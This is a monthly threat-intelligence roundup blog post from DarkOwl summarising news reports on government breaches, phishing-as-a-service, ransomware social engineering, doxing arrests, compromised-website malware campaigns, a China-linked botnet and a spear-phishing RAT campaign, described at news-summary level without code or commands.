Threat Intelligence RoundUp: June

July 01, 2026

Our analyst team shares a few articles each week in our email newsletter which goes every Thursday. Make sure to register! This blog highlights those articles in order of what was the most popular in our newsletter – what our readers found the most intriguing. Stay tuned for a recap every month. We hope sharing these resources and news articles emphasizes the importance of cybersecurity and sheds light on the latest in threat intelligence.

1. French govt messaging service breached in account hijacking attack – Bleeping Computer

France’s digital affairs directorate (DINUM) disclosed a breach of Tchap, the French government’s encrypted messaging platform, after attackers gained access through a compromised user account. The incident was detected by ANSSI on Sunday, and authorities have notified the CNIL due to potential exposure of personal data. A threat actor claimed the breach resulted from a social engineering attack, alleging they obtained leaked LDAP credentials and exfiltrated over 13.5GB of documents and media files shared by government employees. While DINUM has not confirmed these claims, it has alerted all Tchap users and reminded them that public chat rooms are not encrypted. Read full article.

2. FBI Warns of Phishing-as-a-Service Platform Compromising Microsoft 365 – ic3

The FBI has issued a warning about Kali365, a phishing-as-a-service (PHaaS) platform used to compromise Microsoft 365 accounts. The platform leverages device code phishing techniques, exploiting OAuth device code authentication to steal session tokens and circumvent multi-factor authentication (MFA). This authentication method lets devices with limited input capabilities such as smart TVs, conference room systems, streaming devices, printers, and IoT devices to sign in using a short code on another device through Microsoft’s device code login portal. Beginning in April, the platform was distributed via Telegram channels for cybercriminals looking for an easier way to compromise Microsoft 365.

The Silent Ransom Group (SRG) is actively targeting law firms through sophisticated social engineering campaigns. Threat actors typically impersonate IT support personnel via phone calls and phishing emails to gain access to victim systems. Once trust is established, they use legitimate remote access tools to infiltrate networks and exfiltrate sensitive data. In some cases, SRG has reportedly gone a step further by sending individuals to a victim organization’s office to obtain physical access to computers. This activity follows an FBI FLASH advisory issued last week warning that SRG was targeting U.S. law firms through social engineering schemes and in-person data theft operations. Mandiant has released additional technical details describing the group’s intrusion methods. According to Mandiant, SRG targeted dozens of organizations across the legal, financial, and professional services sectors between January and May 2026. Read more here.

On May 27, the Spanish National Police arrested the individual behind data leaks that published information from the State Attorney General’s Office, National Cybersecurity Institute (INCIBE), the National Police, the Civil Guard, and the National Security Council. In February the INCIBE announced an ongoing doxing operation that targeted collection and publication of data impacting key entities and their employees. Potential sources of this information include historical data breaches, credential dumps, and OSINT tools. The data may have been aggregated and correlated from multiple sources to create curated datasets. Some leaked records reportedly contained outdated information, including the names of individuals who had left INCIBE several years earlier. Read here.

5. Hackers hijack thousands of sites for ClickFix and FakeUpdate attacks – Bleeping Computer

Observed activity indicates the threat actor DriveSurge is leveraging compromised websites to facilitate a large-scale distribution campaign utilizing ClickFix and FakeUpdates techniques. Researchers at Silent Push report the DriveSurge campaign has compromised thousands of websites, redirecting visitors to malware-delivery infrastructure. The operation relies on social engineering tactics like ClickFix, which tricks users into running malicious commands under the guise of fixing issues, and FakeUpdates, which uses fake browser update prompts to install malware. Silent Push says DriveSurge mainly acts as an Initial Access Broker (IAB) using a pay-per-install (PPI) model, selling access to infected systems for follow-on cyberattacks. Learn more.

6. FBI warns of in-person data theft attacks from extortion gang – Bleeping Computer

In a recent FBI flash alert, the agency warned that the Silent Ransom Group (SRG) has been targeting U.S.-based law firms through in-person data theft operations. Reports claim that SRG actors employ social engineering tactics by impersonating members of a victim organization’s IT department. These actors either place direct phone calls or send phishing emails instructing employees to contact a fraudulent IT support representative. During the interaction, the SRG actor persuades the employee to grant access through a remote desktop session. If remote access attempts are unsuccessful, SRG may dispatch an individual to the victim’s physical location to obtain direct access and insert a storage device into the victim’s computer. Read full article.

7. China-linked JDY botnet expands targeting of U.S. military networks – Bleeping Computer

The JDY botnet, previously linked to Chinese threat actors such as Volt Typhoon, has significantly expanded its targeting and reconnaissance activities. Researchers at Black Lotus Labs report that JDY remains heavily focused on the United States, particularly military and related networks. The botnet has grown from about 650 active bots in January 2024 to more than 1,500 compromised SOHO and IoT devices today. Analysis of the activity indicates that China-nexus APT actors rapidly operationalize reconnaissance efforts following public vulnerability disclosures, focusing on identifying and targeting vulnerable infrastructure. This activity has been observed across multiple sectors, with U.S. military networks and affiliated organizations representing a primary area of interest. Read full article.

8. Pakistan-Linked SideCopy Targets Afghanistan Finance Ministry with Xeno RAT – The Hacker News

The Pakistan-aligned threat group SideCopy is believed to be behind a spear-phishing campaign, called Operation XENOFISCAL, targeting Afghanistan’s Ministry of Finance and other government entities. The attack uses a malicious Windows Shortcut (LNK) file that launches “mshta.exe” to retrieve a remote HTA file from a compromised Afghan education website. This file executes obfuscated JavaScript in memory, establishes persistence by impersonating Microsoft Edge through Registry modifications, and deploys Xeno RAT 1.8.7 using a DLL-based loader. A decoy document is also displayed to distract victims. Additional targets include provincial revenue and finance directorates, Pashto-speaking government officials, and other provincial government employees. Learn more.


Make sure to register for our weekly newsletter to get access to what our analysts are reading on a weekly basis.

See why DarkOwl is the Leader in Darknet Data

Copyright © 2026 DarkOwl, LLC All rights reserved.
Privacy Policy
DarkOwl is a Denver-based company that provides the world’s largest index of darknet content and the tools to efficiently find leaked or otherwise compromised sensitive data. We shorten the timeframe to detection of compromised data on the darknet, empowering organizations to swiftly detect security gaps and mitigate damage prior to misuse of their data.